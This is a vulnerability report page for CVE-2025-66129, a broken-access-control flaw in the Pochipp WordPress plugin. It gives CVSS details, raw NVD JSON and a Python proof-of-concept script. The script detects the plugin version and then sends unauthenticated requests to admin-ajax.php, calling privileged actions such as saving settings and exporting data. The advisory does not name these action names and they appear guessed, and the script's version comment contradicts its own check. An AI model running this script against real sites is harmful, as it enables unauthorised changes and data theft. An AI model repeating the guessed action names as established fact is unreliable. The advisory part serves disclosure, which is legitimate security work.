Security Vulnerability Report
中文
CVE-2025-66129 CVSS 5.3 MEDIUM

CVE-2025-66129

Published: 2025-12-16 09:15:57
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pochipp: from n/a through <= 1.18.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Pochipp <= 1.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66129 PoC - Pochipp < 1.18.0 Authorization Bypass # This PoC demonstrates exploiting the missing authorization vulnerability TARGET_URL = "http://target-wordpress-site.com" def check_pochipp_version(): """Check if Pochipp plugin is installed and get version""" url = f"{TARGET_URL}/wp-content/plugins/pochipp/readme.txt" try: response = requests.get(url, timeout=10) if response.status_code == 200 and "Pochipp" in response.text: for line in response.text.split('\n'): if line.startswith('Version:'): return line.split(':')[1].strip() except: pass return None def exploit_authorization_bypass(): """Exploit missing authorization in Pochipp plugin The plugin's AJAX handlers don't properly verify user capabilities before executing privileged operations. """ # Common Pochipp AJAX actions that lack authorization checks actions = [ 'pochipp_get_link_data', 'pochipp_save_settings', 'pochipp_export_data', 'pochipp_sync_affiliate_data' ] for action in actions: data = { 'action': action, # No nonce verification required due to missing check # No capability verification (current_user_can not called) } try: response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=data, timeout=10 ) if response.status_code == 200: print(f"[!] Action '{action}' executed without authorization") print(f" Response: {response.text[:200]}") except Exception as e: print(f"[-] Error with action '{action}': {e}") if __name__ == "__main__": print("CVE-2025-66129 PoC - Pochipp Authorization Bypass") print("=" * 50) version = check_pochipp_version() if version: print(f"[+] Pochipp version detected: {version}") if version.replace('.', '').isdigit() and tuple(map(int, version.split('.'))) <= (1, 18, 0): print("[!] Target is vulnerable!") exploit_authorization_bypass() else: print("[-] Target may not be vulnerable (version > 1.18.0)") else: print("[-] Could not detect Pochipp version")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66129", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:57.397", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pochipp: from n/a through <= 1.18.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pochipp/vulnerability/wordpress-pochipp-plugin-1-18-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}